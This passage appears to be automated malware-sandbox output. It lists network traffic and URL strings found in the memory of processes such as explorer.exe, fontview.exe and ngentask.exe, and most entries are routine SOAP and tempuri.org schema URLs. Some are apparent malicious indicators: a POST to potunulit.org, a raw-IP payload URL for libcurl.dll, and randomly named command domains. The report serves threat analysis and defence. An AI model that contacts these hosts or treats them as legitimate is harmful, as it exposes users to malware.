Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fyeyf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: potunulit.org
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View IP Address: 188.114.96.3
Source: global traffic TCP traffic: 192.168.2.4:49738 -> 89.208.103.88:37538
Source: fontview.exe, 0000000D.00000002.573042079.0000000000D8C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://109.206.243.168/upload/libcurl.dll
Source: fontview.exe, 0000000D.00000002.573042079.0000000000D8C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://109.206.243.168/upload/libcurl.dllw
Source: explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://aygtqn.org/
Source: explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://aygtqn.org/tem/W
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://egqgnqk.org/
Source: explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://egqgnqk.org/s
Source: explorer.exe, 00000003.00000003.450627478.00000000085C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://fedface.com/
Source: C4AA.exe, 00000009.00000002.573780441.000000000123A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://gEKjeGOUdN6i5fBcEs.jOmF6MtoBKl32eAI1QwqxSxpNFyV2s/
Source: C4AA.exe, 00000009.00000002.573780441.000000000123A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://gEKjeGOUdN6i5fBcEs.jOmF6MtoBKl32eAI1QwqxSxpNFyV2s/)
Source: C4AA.exe, 00000009.00000002.573780441.000000000123A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://gEKjeGOUdN6i5fBcEs.jOmF6MtoBKl32eAI1QwqxSxpNFyV2s/7
Source: C4AA.exe, 00000009.00000002.581264787.0000000002D80000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://gEKjeGOUdN6i5fBcEs.jOmF6MtoBKl32eAI1QwqxSxpNFyV2sMicrosoft
Source: C4AA.exe, 00000009.00000002.573780441.000000000123A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s/
Source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: explorer.exe, 00000003.00000003.450504843.0000000008465000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450669727.000000000CE96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450504843.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/
Source: explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/22n-g
Source: explorer.exe, 00000003.00000003.450504843.0000000008465000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/:
Source: explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/:=f
Source: explorer.exe, 00000003.00000003.450669727.000000000CE96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449577540.0000000008394000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/G
Source: explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/J2v-m
Source: explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/hg
Source: explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/s
Source: explorer.exe, 00000003.00000003.449577540.000000000834F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org:80/
Source: explorer.exe, 00000003.00000003.450669727.000000000CDE5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org:80/N
Source: explorer.exe, 00000003.00000003.450627478.00000000085C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ryjphgb.com/
Source: explorer.exe, 00000003.00000003.450627478.00000000085C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ryjphgb.com/pace
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20
